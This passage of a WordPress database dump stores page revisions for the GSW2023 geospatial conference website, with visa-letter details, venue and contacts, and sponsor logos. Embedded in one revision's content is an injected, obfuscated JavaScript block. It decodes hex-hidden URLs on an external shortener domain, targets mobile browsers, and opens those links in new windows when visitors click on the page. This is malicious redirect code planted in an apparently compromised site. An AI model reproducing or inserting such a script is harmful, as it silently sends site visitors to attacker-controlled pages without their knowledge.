sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 12:58:55','2023-09-04 12:58:55','',3066,'https://gsw2023.com/?p=5455',0,'revision','',0),
(5456,1,'2023-09-04 13:10:35','2023-09-04 13:10:35','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://www.esri.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" 